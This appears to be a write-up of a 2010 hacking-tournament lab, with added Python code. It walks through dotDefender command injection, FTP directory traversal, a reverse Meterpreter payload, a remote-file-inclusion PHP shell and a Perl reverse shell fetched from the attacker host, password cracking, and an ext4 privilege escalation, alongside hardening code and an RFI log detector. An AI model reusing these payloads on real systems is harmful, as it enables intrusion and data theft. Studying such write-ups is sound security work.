Woff Hsiyf Report Final
Page 1
1 Table Of Contents
2 Introduction
2.1 Global Objectives
2.2 Global Objective Summary
2.3 Global Objective Summary Report
3 External Network Assessment on n00b filter machine (Objective 1.1)
3.1 Information Gathering
3.2 Attack Vector
3.3 Recommendations
3.3.1 Information Disclosure
3.3.2 Weak Password
3.3.3 Remote Command Execution Vulnerability
4 Internal Network Assessment on machine KILLTHEN00B (Objective 2.1)
4.1 Information Gathering
4.2 Attack Vector
4.3 Other Vulnerabilities Found
4.4 Recommendations
4.4.1 Information Disclosure
4.4.2 Directory Traversal in the FTP service
4.4.3 Weak Password
4.4.4 Potentially Vulnerable SurgeMail services
5 Internal Network Assessment on machine GHOST (Objective 2.2)
5.1 Information Gathering
5.2 Attack Vector
5.3 Recommendations
5.3.1 Information Disclosure
5.3.2 Remote File Inclusion Vulnerability
5.3.3 Dangerous Software Packages
5.3.4 Local Privilege Escalation Vulnerability
6 Appendix
6.1 Dotdefender Remote Command Execution 3.8-5
6.2 CompleteFTP Server Directory Traversal
6.3 Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities
6.4 Modified php shell source code
6.5 Linux Kernel Ext4 'move extents' ioctl Local Privilege Escalation Vulnerability
6.6 Getting around "su : must be run from a terminal"
2 Introduction
Offensive Security announced the How Strong Is Your FU public hacking tournament, which started on 8 May 2010. The tournament had two phases; only the first 100 contestants who completed Phase 1 were allowed to proceed to Phase 2. The tournament had the following rules:
- Contestants were allowed to attack only the IPs listed below.
- Contestants were not allowed to launch DoS attacks, ARP spoofing, or deface the machines.
- Contestants were not allowed to launch disruptive attacks.
This report contains my findings gathered during the assessment. The assessment was done with the following knowledge of the infrastructure, systems and applications:
- The n00b filter machines were available on 67.23.72.4 (www1.noob-filter.com) and 67.23.72.5 (www2.noob-filter.com).
- FTP credentials: devil / killthen00b
- Internal VPN IPs: 192.168.6.66/67/68 (all the same host) and 192.168.6.70/71/72 (all the same host)
This report is divided into sub-sections. Each sub-section discusses in detail the relevant issues and the avenues an attacker could use to compromise the system and gain unauthorized access to sensitive information. Every issue includes recommendations which, if followed correctly, will help protect the integrity of the systems, devices and applications.
After opening http://www1.noob-filter.com/, a simple login page with a username and a password field was displayed. An (unsuccessful) SQL injection attempt produced an error message.
The dotDefender application's site management page was password protected under the default dotDefender folder. The username for the HTTP Basic Authentication was displayed in the prompt message (admin), and the password was easily guessable (password). The Authorization header was extracted from Paros Proxy's logs and used to forge a request that exploits a remote command execution vulnerability (see Appendix 6.1) in dotDefender's site management interface. The following forged request was sent with Paros Proxy's manual request editor to find the required n00bSecret.txt:
POST http://www1.noob-filter.com/dotDefender/index.cgi HTTP/1.1
Host: www1.noob-filter.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www1.noob-filter.com/dotDefender/index.cgi
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

sitename=notexisting&deletesitename=notexisting;id;find / -name n00bSecret.txt;&action=deletesite&linenum=15
The response contained the location of the required file (/opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt) after the <!-- webmin compat --> HTML comment. To view the contents of the file, the following request was sent:
POST http://www2.noob-filter.com/dotDefender/index.cgi HTTP/1.1
Host: www2.noob-filter.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.noob-filter.com/dotDefender/
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 141

sitename=notexisting&deletesitename=notexisting;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;&action=deletesite&linenum=15
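The two forged POSTs above were hand-built in Paros. The following added example (my code, not part of the original report and not a tool used in it) reproduces the same request shape in Python and pulls the command output out of a response: the Basic credential is derived from admin/password, the body is sent raw exactly as in the report, and the output is read after the <!-- webmin compat --> comment the report mentions. The sample response is constructed for the example; the real page body is not reproduced in the report, and no host is contacted.

```python
from __future__ import annotations

import base64
import re

TARGET_HOST = "www1.noob-filter.com"   # host from the report; not contacted here
MARKER = "<!-- webmin compat -->"      # the report says the output follows this comment


def basic_auth_header(user: str, password: str) -> str:
    """Value of the Authorization header for HTTP Basic auth: base64(user:password)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def deletesite_body(sitename: str, injected_cmd: str, linenum: int = 15) -> str:
    """Form body for the 'deletesite' action with a shell command appended to
    deletesitename. Sent raw, as in the report's request: the ';' before the
    command terminates the 'rm -f .../<name>_params' the CGI builds, and the
    trailing ';' separates our command from the rest of that line."""
    return (f"sitename={sitename}"
            f"&deletesitename={sitename};{injected_cmd};"
            f"&action=deletesite&linenum={linenum}")


def forge_request(host: str, body: str, auth: str) -> str:
    """Raw HTTP/1.1 request text whose Content-Length matches the body."""
    headers = [
        "POST /dotDefender/index.cgi HTTP/1.1",
        f"Host: {host}",
        f"Authorization: {auth}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode())}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def extract_command_output(html: str) -> list[str]:
    """Non-empty text lines the CGI echoed after MARKER, with HTML tags removed.
    Returns [] when the marker is absent (for example when auth failed)."""
    if MARKER not in html:
        return []
    tail = html.split(MARKER, 1)[1]
    text = re.sub(r"<[^>]+>", "", tail)
    return [line.strip() for line in text.splitlines() if line.strip()]


def locate_file(html: str, filename: str) -> str | None:
    """First absolute path in the echoed output that ends with filename."""
    for line in extract_command_output(html):
        if line.startswith("/") and line.endswith("/" + filename):
            return line
    return None


# Constructed sample response (placeholder, not the real server output).
SAMPLE_RESPONSE = (
    "<html><body>\n"
    f"{MARKER}\n"
    "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
    "/opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt\n"
    "</body></html>\n"
)


if __name__ == "__main__":
    auth = basic_auth_header("admin", "password")
    body = deletesite_body("notexisting", "id;find / -name n00bSecret.txt")
    print(forge_request(TARGET_HOST, body, auth))
    print(locate_file(SAMPLE_RESPONSE, "n00bSecret.txt"))
```

The credential the function produces for admin/password is the same YWRtaW46cGFzc3dvcmQ= token that appears in the captured requests, which is how the weak password was confirmed from the proxy log alone.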
3.3 Recommendations
3.3.1 Information Disclosure
The server disclosed the IPS/WAF product in use through dotDefender's default block page. It is recommended to configure dotDefender so that its block page shows only the information the user needs.
The site management interface of dotDefender was installed under a well-known directory. It is recommended to install it under a non-default path. The authentication prompt contained a valid username. It is recommended to remove this information from the authentication message.
3.3.2 Weak Password
The admin user had a trivial password. It is recommended to set complex passwords for administrator accounts.
3.3.3 Remote Command Execution Vulnerability
The installed version of dotDefender was outdated. It is recommended to update the installed software regularly. Moving the interface or hiding the username only raises the cost of finding it; the injection in the deletesite handler (Appendix 6.1) is removed only by upgrading or by validating deletesitename before it reaches the system() call.
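To make the last recommendation concrete, here is an added example (my code, not the report's and not dotDefender's) that models in Python the 'deletesite' handler whose Perl source is quoted in Appendix 6.1. Line 331 there interpolates the raw POST field into system("rm -f ..."); the hardened version below validates the name against a whitelist and never starts a shell. The whitelist is an assumption for the example (it is stricter than cleanIt(), allowing no ~ or '), and the temporary directory stands in for $CTMP_DIR.

```python
import os
import re
import tempfile

# Assumed whitelist for site names (stricter than the Perl cleanIt() default branch).
SITENAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def vulnerable_delete_command(ctmp_dir: str, deletesitename: str) -> str:
    """The shell string the original code hands to system(): whatever the client
    put in deletesitename is parsed by /bin/sh, so ';' starts a new command.
    Returned as a string here; it is deliberately never executed."""
    return f"rm -f {ctmp_dir}/{deletesitename}_params"


def is_valid_sitename(deletesitename: str) -> bool:
    """Whitelist check: letters, digits, '.', '_', '-' only, so no shell
    metacharacters and no '/' that could leave ctmp_dir."""
    return SITENAME_RE.fullmatch(deletesitename) is not None


def hardened_delete(ctmp_dir: str, deletesitename: str) -> str:
    """Validate, then remove the params file without a shell.
    Returns the path that was removed (or did not exist, mirroring rm -f)."""
    if not is_valid_sitename(deletesitename):
        raise ValueError(f"invalid site name: {deletesitename!r}")
    target = os.path.join(ctmp_dir, f"{deletesitename}_params")
    try:
        os.remove(target)        # no shell involved, so no metacharacters to interpret
    except FileNotFoundError:
        pass                     # rm -f semantics: a missing file is not an error
    return target


def demo_hardened_delete() -> bool:
    """Create a throwaway <site>_params file and check hardened_delete removes it."""
    with tempfile.TemporaryDirectory() as ctmp:   # stand-in for dotDefender's $CTMP_DIR
        path = os.path.join(ctmp, "site1_params")
        open(path, "w").close()
        removed = hardened_delete(ctmp, "site1")
        return removed == path and not os.path.exists(path)


if __name__ == "__main__":
    payload = "notexisting;id;find / -name n00bSecret.txt;"
    print("shell would see:", vulnerable_delete_command("/var/tmp/ctmp", payload))
    print("whitelist accepts payload:", is_valid_sitename(payload))
    print("hardened delete works for a valid name:", demo_hardened_delete())
```

If a subprocess really is needed, pass an argument list to subprocess.run() rather than a string with shell=True; the whitelist then becomes defence in depth rather than the only barrier.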
Discovered open port 106/tcp on 192.168.6.72
Discovered open port 366/tcp on 192.168.6.72
Discovered open port 7443/tcp on 192.168.6.72
Discovered open port 7025/tcp on 192.168.6.72
Completed SYN Stealth Scan at 18:24, 21.77s elapsed (1000 total ports)
Initiating Service scan at 18:24
Scanning 14 services on 192.168.6.72
Completed Service scan at 18:24, 22.21s elapsed (14 services on 1 host)
NSE: Script scanning 192.168.6.72.
NSE: Script Scanning completed.
Host 192.168.6.72 is up (0.18s latency).
Scanned at 2010-05-08 18:24:01 CEST for 44s
Interesting ports on 192.168.6.72:
Not shown: 986 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp
25/tcp   open  smtp          Surgemail smtpd 3.8k4-4
80/tcp   open  http          DNews Web Based Manager
106/tcp  open  pop3pw        Qualcomm poppassd (Maximum users connected)
110/tcp  open  pop3          SurgeMail pop3d 3.8k4-4
143/tcp  open  imap          SurgeMail imapd 3.8k4-4
366/tcp  open  smtp          Surgemail smtpd 3.8k4-4
465/tcp  open  ssl/smtp      Surgemail smtpd 3.8k4-4
587/tcp  open  smtp          Surgemail smtpd 3.8k4-4
993/tcp  open  ssl/imap      SurgeMail imapd 3.8k4-4
995/tcp  open  tcpwrapped
3389/tcp open  ms-term-serv?
7025/tcp open  tcpwrapped
7443/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port21-TCP:V=5.00%I=7%D=5/8%Time=4BE59040%P=i686-pc-linux-gnu%r(NULL,31
SF:,"220-Complete\x20FTP\x20server\r\n220\x20FTP\x20Server\x20v\x203\.3\.0
SF:\r\n")%r(GenericLines,31,"220-Complete\x20FTP\x20server\r\n220\x20FTP\x
SF:20Server\x20v\x203\.3\.0\r\n")%r(Help,54,"220-Complete\x20FTP\x20server
SF:\r\n220\x20FTP\x20Server\x20v\x203\.3\.0\r\n502\x20Command\x20not\x20im
SF:plemented:\x20HELP\r\n")%r(SMBProgNeg,31,"220-Complete\x20FTP\x20server
SF:\r\n220\x20FTP\x20Server\x20v\x203\.3\.0\r\n");
MAC Address: 00:0C:29:B4:7D:53 (VMware)
Service Info: Host: killthen00b

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.37 seconds
           Raw packets sent: 2987 (131.424KB) | Rcvd: 27 (1162B)
FTP credentials (devil/killthen00b) were given. Connecting to port 3389 of the machine with rdesktop showed that the installed operating system is Windows 7. With the provided username and password, Windows denied the logon because the user was not a member of the Remote Desktop Users group, which confirms that devil is a valid local user with the above-mentioned password.
After connecting to the FTP server with the provided username and password, a directory traversal vulnerability (see Appendix 6.2) was exploited to move files between the server and the attacking machine outside the FTP user's home directory.
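The check that the FTP server should have applied before touching the filesystem, as an added example (my code, not the report's and not CompleteFTP's): the client path is normalised inside a virtual root that is the user's home, so '..' is collapsed before the home prefix is added and can never climb above it, and backslashes are treated as separators so the Windows spelling '..\' is not missed. The home directory and client paths are constructed for the example and use POSIX separators; a Windows server would apply the same logic after os.path.realpath() on the real path.

```python
import posixpath


def naive_map(home: str, requested: str) -> str:
    """What a vulnerable server effectively does: glue the client path onto the
    home directory and let the OS resolve '..' afterwards, which walks out of home."""
    return posixpath.normpath(home + "/" + requested.replace("\\", "/"))


def map_client_path(home: str, client_cwd: str, requested: str) -> str:
    """Resolve a client-supplied path inside a virtual root rooted at home.
    Raises PermissionError on drive letters, NUL bytes, or any result outside home."""
    home = posixpath.normpath(home)
    req = requested.replace("\\", "/")          # '..\' is as good as '../' to Windows
    if "\x00" in req or ":" in req:             # C:\... or NUL truncation tricks
        raise PermissionError(f"rejected path: {requested!r}")
    virtual = req if req.startswith("/") else posixpath.join(client_cwd, req)
    # normpath() drops leading '..' of an absolute path, so the virtual path
    # cannot go above '/'; it keeps exactly two leading slashes, hence the lstrip.
    virtual = "/" + posixpath.normpath(virtual).lstrip("/")
    real = posixpath.normpath(home + virtual)
    # Defence in depth: the prefix check must hold even if the logic above changes.
    if real != home and not real.startswith(home + "/"):
        raise PermissionError(f"escapes home: {requested!r}")
    return real


def is_allowed(home: str, client_cwd: str, requested: str) -> bool:
    """True when the request maps to a path inside home."""
    try:
        map_client_path(home, client_cwd, requested)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    home = "/srv/ftp/devil"                     # constructed home directory
    for cwd, path in [("/", "../../../etc/passwd"),
                      ("/", "..\\..\\Windows\\win.ini"),
                      ("/uploads", "shell.exe"),
                      ("/", "C:\\surgemail\\scripts\\x.exe")]:
        print(f"{path!r:40} naive={naive_map(home, path):30} "
              f"safe={'denied' if not is_allowed(home, cwd, path) else map_client_path(home, cwd, path)}")
```

The naive mapping of "../../../etc/passwd" lands on /etc/passwd; the confined mapping lands on /srv/ftp/devil/etc/passwd, which is exactly the difference the report exploited on KILLTHEN00B to reach c:/surgemail/scripts/.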
In order to gain a shell on the machine, a reverse_tcp Meterpreter payload was uploaded to the CGI directory (c:/surgemail/scripts/). The executable containing the reverse Meterpreter payload was created with the following command:
root@woff-laptop:/pentest/exploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.112 X > /home/woff/Documents/HSIYF/exploit/meterpreter_mine.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=192.168.6.112
To handle the incoming connection, the Meterpreter listener was started from msfconsole. After opening http://192.168.6.72/scripts/meterpreter_mine.exe in a browser, the reverse Meterpreter session opened:
Basic information about the machine and the level of privilege gained were checked.
With NT AUTHORITY\SYSTEM rights, proof.txt was extracted from the Administrator user's Desktop.
Using John the Ripper, user n00b's password was cracked in a reasonable time:
root@woff-laptop:/pentest/password/john/run# ./john n00b.txt
Loaded 2 password hashes with 2 different salts (OpenLDAP SSHA [salted SHA-1])
pippo123         (n00b@killthen00b)
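John reports the hashes as OpenLDAP SSHA. The following added example (my code, not the report's and not John the Ripper's) shows what that format is and what the cracker does with it: the value is base64(SHA1(password || salt) || salt), so the salt is recovered from the hash itself and each candidate costs one SHA-1. The hash below is constructed here with a fixed salt for reproducibility; the report does not reproduce the real n00b.txt entry, and the wordlist is invented.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import os


def make_ssha(password: str, salt: bytes | None = None) -> str:
    """OpenLDAP {SSHA} encoding: base64(SHA1(password || salt) || salt)."""
    salt = os.urandom(4) if salt is None else salt
    digest = hashlib.sha1(password.encode() + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode()


def split_ssha(ssha: str) -> tuple[bytes, bytes]:
    """Return (digest, salt). A SHA-1 digest is 20 bytes; whatever follows is the salt."""
    if not ssha.startswith("{SSHA}"):
        raise ValueError("not an {SSHA} hash")
    raw = base64.b64decode(ssha[len("{SSHA}"):])
    return raw[:20], raw[20:]


def verify_ssha(password: str, ssha: str) -> bool:
    """Re-hash the candidate with the salt pulled out of the stored value."""
    digest, salt = split_ssha(ssha)
    candidate = hashlib.sha1(password.encode() + salt).digest()
    return hmac.compare_digest(candidate, digest)


def crack_ssha(ssha: str, wordlist: list[str]) -> str | None:
    """Dictionary attack: first word that verifies, else None. The salt only
    prevents precomputation across users; a short common password still falls
    after a handful of SHA-1 calls, which is why 'pippo123' took no time."""
    for word in wordlist:
        if verify_ssha(word, ssha):
            return word
    return None


# Constructed stand-in for the n00b entry in n00b.txt (fixed salt, not the real hash).
SAMPLE_HASH = make_ssha("pippo123", salt=bytes.fromhex("deadbeef"))
SAMPLE_WORDLIST = ["123456", "password", "killthen00b", "pippo123", "letmein"]


if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack_ssha(SAMPLE_HASH, SAMPLE_WORDLIST))
```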
Based on vulnerability reports available on the internet, the installed version of SurgeMail might be vulnerable to post-authentication buffer overflows. These exploits could have been used with the above-mentioned username and password to gain a shell on the machine.
4.4 Recommendations
4.4.1 Information Disclosure
The FTP server on port 21 returned a banner identifying the product and version. It is recommended to configure a generic banner for the FTP service.
4.4.2 Directory Traversal in the FTP service
The installed version of Complete FTP Server was vulnerable to a directory traversal attack. It is recommended to update the installed software regularly.
4.4.3 Weak Password
The n00b user had a simple password. It is recommended to set complex passwords.
4.4.4 Potentially Vulnerable SurgeMail services
The installed version of SurgeMail might be vulnerable to several published exploits. It is recommended to update the installed software regularly.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port80-TCP:V=5.00%I=7%D=5/8%Time=4BE58D4D%P=i686-pc-linux-gnu%r(GetRequ
SF:est,333,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2008\x20May\x202010\x
SF:2001:06:08\x20GMT\r\nServer:\x20Microsoft-IIS\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\r\nContent-Type:\x20text/html\r\nCache-control:\x20private\r
SF:\nVary:\x20Accept-Encoding\r\nContent-Length:\x20619\r\nConnection:\x20
SF:close\r\n\r\n<html>\n<head>\n<title>Let's\x20play\x20with\x20the\x20off
SF:sec\x20team</title>\n</head>\n<body\x20style=\"color:\x20#FFFFFF;\x20ba
SF:ckground-color:\x20#000000;font-family:\x20verdana;\">\n<center>\n<div\
SF:x20style=\"width:600px;height:399px;background-image:url\(offsec-team\.
SF:jpg\);\">\n<form\x20method=\"post\"\x20action=\"login\.asp\">\n<table\x
SF:20style=\"padding-top:170px;\">\n<tr>\n<td>Username:\x20</td><td><input
SF:\x20type=\"text\"\x20name=\"username\"\x20value=\"\"></td>\n</tr>\n<tr>
SF:\n<td>Password:\x20</td><td><input\x20type=\"password\"\x20name=\"passw
SF:ord\"></td>\n</tr>\n<tr>\n<td\x20colspan=\"2\"\x20align=\"right\"><inpu
SF:t\x20type=\"submit\"\x20name=\"submit\"\x20value=\"Enter\"></td>\n</tr>
SF:\n</table>\n</form>\n</div>\n</center>\n</body>\n</html>\n")%r(HTTPOpti
SF:ons,333,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2008\x20May\x202010\x
SF:2001:06:09\x20GMT\r\nServer:\x20Microsoft-IIS\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\r\nContent-Type:\x20text/html\r\nCache-control:\x20private\r
SF:\nVary:\x20Accept-Encoding\r\nContent-Length:\x20619\r\nConnection:\x20
SF:close\r\n\r\n<html>\n<head>\n<title>Let's\x20play\x20with\x20the\x20off
SF:sec\x20team</title>\n</head>\n<body\x20style=\"color:\x20#FFFFFF;\x20ba
SF:ckground-color:\x20#000000;font-family:\x20verdana;\">\n<center>\n<div\
SF:x20style=\"width:600px;height:399px;background-image:url\(offsec-team\.
SF:jpg\);\">\n<form\x20method=\"post\"\x20action=\"login\.asp\">\n<table\x
SF:20style=\"padding-top:170px;\">\n<tr>\n<td>Username:\x20</td><td><input
SF:\x20type=\"text\"\x20name=\"username\"\x20value=\"\"></td>\n</tr>\n<tr>
SF:\n<td>Password:\x20</td><td><input\x20type=\"password\"\x20name=\"passw
SF:ord\"></td>\n</tr>\n<tr>\n<td\x20colspan=\"2\"\x20align=\"right\"><inpu
SF:t\x20type=\"submit\"\x20name=\"submit\"\x20value=\"Enter\"></td>\n</tr>
SF:\n</table>\n</form>\n</div>\n</center>\n</body>\n</html>\n");
MAC Address: 00:0C:29:91:42:FA (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.18 seconds
+ OSVDB-7: GET /iissamples/exair/howitworks/Code.asp : Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ 3577 items checked: 4 item(s) reported on remote host
+ End Time: 2010-05-09 18:53:40 (1632 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Although the server responses indicated that the web server was IIS, and nikto found some IIS FrontPage-related files, HTTP fingerprinting and analysis of the responses showed that Apache 2 was serving the HTTP requests. httprint gave the following results:
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/

Finger Printing on http://192.168.6.68:80/
Finger Printing Completed on http://192.168.6.68:80/
--------------------------------------------------
Host: 192.168.6.68

Derived Signature:
Microsoft-IIS
811C9DC56ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC5
0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5
6ED3C2956ED3C2956ED3C295811C9DC5E2CE6927811C9DC56ED3C295811C9DC5
6ED3C2956ED3C2952A200B4C6ED3C2956ED3C2956ED3C2956ED3C295E2CE6923
E2CE69236ED3C295811C9DC5E2CE6927E2CE6923

Banner Reported: Microsoft-IIS
Banner Deduced: Apache/2.0.x
Score: 95
Confidence: 57.23
The login page on http://192.168.6.68/ was not vulnerable to SQL injection and did not return any error messages. Manual enumeration of web directories returned a positive result for /test.
During the manual enumeration of web directories, http://192.168.6.68/test/ was redirected by the server to http://192.168.6.68/test.asp.
After deobfuscating the code (a simple hex-to-ASCII conversion of the array values), two images were identified (0.gif and 1.gif). Requesting /1.gif redirected to /1/1.jpeg, so http://192.168.6.68/1/ was opened in a browser to check for interesting files; it returned a login screen.
The parameter names used here differed from those on the main page. A Google search for the parameter names tied them to the open-source Simple Text-File Login script, which is vulnerable to remote file inclusion (see Appendix 6.3). To exploit the vulnerability, Apache was started on the attacking machine and a modified PHP shell script (see Appendix 6.4) was hosted there for remote inclusion.
The following URL was requested to run the whoami command on the target:
http://192.168.6.68/1/slogin_lib.inc.php?slogin_path=http%3A%2F%2F192.168.6.112%2Fshll%2F&command=whoami&dir=%2Fvar%2Fwww
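From the defender's side, a request like the one above is easy to pick out of the web server log because the included parameter value is itself a URL. The following added example (my code, not part of the original report and not a tool used in it) runs a remote-file-inclusion detector over Apache combined-format access log lines. The log lines are constructed for the example: the first carries the exact request shown above; the other client addresses, timestamps and the evil.example host are placeholders.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format up to the status code; the rest of the line is not needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Schemes that make include($slogin_path . "header.inc.php") fetch and run
# attacker-supplied code: remote URLs, plus PHP stream wrappers that are
# commonly abused in the same position.
RFI_SCHEME = re.compile(r"^(https?|ftps?|php|data|expect|phar)://", re.IGNORECASE)


def rfi_values(target: str) -> list[tuple[str, str]]:
    """(param, decoded value) pairs in the request target whose value starts
    with a remote scheme. The value is decoded a second time so that a
    double-encoded scheme (http%253A%252F%252F...) is not missed."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value).strip()
        if RFI_SCHEME.match(decoded):
            hits.append((name, decoded))
    return hits


def find_rfi_attempts(lines: list[str]) -> list[dict]:
    """One record per suspicious parameter: who, when, which parameter,
    what it pointed at, and the status the server answered with."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip it
        for param, value in rfi_values(m["target"]):
            findings.append({
                "ip": m["ip"], "time": m["time"], "param": param,
                "value": value, "status": int(m["status"]),
            })
    return findings


# Constructed sample log (placeholders except for the first request path).
SAMPLE_LOG = [
    '192.168.6.112 - - [09/May/2010:19:02:11 +0200] "GET /1/slogin_lib.inc.php'
    '?slogin_path=http%3A%2F%2F192.168.6.112%2Fshll%2F&command=whoami&dir=%2Fvar%2Fwww'
    ' HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/May/2010:19:03:40 +0200] "GET /1/index.php?page=home HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [09/May/2010:19:04:02 +0200] "POST /1/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [09/May/2010:19:05:15 +0200] "GET /1/slogin_lib.inc.php'
    '?slogin_path=http%253A%252F%252Fevil.example%252Fs.txt HTTP/1.0" 200 88 "-" "curl/7.19"',
]


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["param"]}={hit["value"]} -> {hit["status"]}')
```

A 200 on a flagged line is the signal to escalate: with allow_url_include on, the server fetched and executed the remote file rather than failing. Note that this detector covers only the remote case; the same parameter fed a local path ("../../etc/passwd") is a traversal or local-inclusion attempt and needs a separate rule.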
After looking through the accessible files and basic system information, a Perl reverse shell (connecting back to port 4567) was downloaded from the attacking machine (wget http://192.168.6.112/shll/rev.pl) and executed (perl rev.pl) through the PHP shell.
Figure 12 Execution of the uploaded Perl reverse shell using the PHP shell
Using the reverse Perl shell:
- The mounted drives were identified with mount
- The kernel version was identified with uname -a
- A copy of the GNU C Compiler was found in /usr/bin (gcc-4.4)
The kernel version indicated that the system was affected by several known vulnerabilities, but most of the exploits were either not accessible or did not work. Checking recent Ubuntu vulnerabilities on http://securityfocus.com/ led to an ext4 exploit (see Appendix 6.5). Since the filesystem of / was ext4, the exploit was promising. The exploit was downloaded from the attacking machine to GHOST and the .c sources were compiled manually with /usr/bin/gcc-4.4. The shell script that came with the exploit was not used; every command was issued manually. Since the attacked machine was running Ubuntu and the last step of the exploit was a su root command (which requires a TTY), a Python workaround (see Appendix 6.6) was used to obtain a TTY in the reverse Perl shell. With the elevated privileges, /root/proof.txt became accessible.
Figure 14 Successful privilege escalation attack after gaining a TTY in the reverse Perl shell
5.3 Recommendations
5.3.1 Information Disclosure
Test scripts were left on the machine and are accessible at guessable URLs. It is recommended to remove every test script from the machine.
5.3.2 Remote File Inclusion Vulnerability
The installed version of SiTeFiLo (Simple Text-File Login) is vulnerable to remote file inclusion. It is recommended to upgrade the software on the machine regularly. It is also recommended to harden php.ini: set allow_url_include = Off (and allow_url_fopen = Off where the application does not need it) so that include() cannot load remote sources, and list dangerous functions such as exec, shell_exec, system and passthru in disable_functions.
5.3.3 Dangerous Software Packages
gcc-4.4 is available on the server. It is recommended to remove development tools from the machine or to restrict their use to highly privileged users.
5.3.4 Local Privilege Escalation Vulnerability
The system is not up to date and contains an exploitable kernel vulnerability. It is recommended to upgrade the machine regularly.
6 Appendix
6.1 Dotdefender Remote Command Execution 3.8-5
Source: http://www.exploit-db.com/exploits/10261
# Title: Dotdefender Remote Command Execution 3.8-5
# EDB-ID: 10261
# CVE-ID: ()
# OSVDB-ID: ()
# Author: John Dos
# Published: 2009-12-01
# Verified: yes

Problem Description
===================

A remote command execution vulnerability exists in the dotDefender (3.8-5) Site Management.

dotDefender [1] is a web application firewall (WAF) which 'prevents hackers from attacking your website.'

Technical Details
=================

The Site Management application of dotDefender is reachable as a web application (https://site/dotDefender/) on the webserver. After passing the Basic Auth login you can create/delete applications. The mentioned vulnerability is in the 'deletesite' implementation and the 'deletesitename' variable. Insufficient input validation allows an attacker to inject arbitrary commands.

Delete Site
===========

A normal delete transaction looks as follows:

POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14

An attack looks like:

--------------------/Request/--------------------
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
